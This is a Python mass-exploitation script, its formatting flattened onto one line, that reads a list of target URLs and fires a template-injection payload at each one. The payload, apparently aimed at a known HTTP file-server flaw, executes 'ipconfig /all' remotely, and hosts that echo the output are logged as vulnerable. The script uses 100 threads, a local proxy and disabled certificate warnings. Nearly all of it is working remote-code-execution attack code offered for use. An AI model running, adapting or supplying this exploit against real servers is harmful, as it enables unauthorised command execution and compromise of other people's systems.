#!/usr/bin/python3 from random import random import requests import threading import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) file_lock = threading.Lock() # WRITE_URL def write_to_file(data): with file_lock: with open("vul_url", "a+") as file: file.write(data + "\n") def run(url): try: vul_url = url + """/?s=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}""" res = requests.get(url=vul_url, proxies={'http':'http://127.0.0.1:7890'}) # SSTI-> # <.....'RESULT'> # RESULT: # System infomation # If the site is vulnerable, the echo message will contain multiple "RESULT" if res.text.count('RESULT') >= 2: print(f"{url} is vulnerbale") write_to_file(url) except Exception as e: print(e) return None max_threads = 100 semaphore = threading.Semaphore(max_threads) class MyThread(threading.Thread): def __init__(self, url): super().__init__() self.url = url def run(self): try: run(self.url) except requests.exceptions.RequestException as e: return None semaphore.release() def print_ascii_art(): print(""" ██████ ██ ██ ███████ ██████ ██████ ██████ ██ ██ ██████ ██████ ██████ █████ ██████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ ███████ █████ █████ █████ ███████ ██████ █████ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ████ ███████ ███████ ██████ ███████ ██ ███████ ██████ ██████ █████ ███████ @Leviathan """) def main(): print_ascii_art() print("Script is running!") # OPEN URL FILE with open("xxx.txt", "r") as file: urls = file.readlines() threads = [] for url in urls: semaphore.acquire() thread = MyThread(url.strip()) thread.start() threads.append(thread) for thread in threads: thread.join() if __name__ == "__main__": main()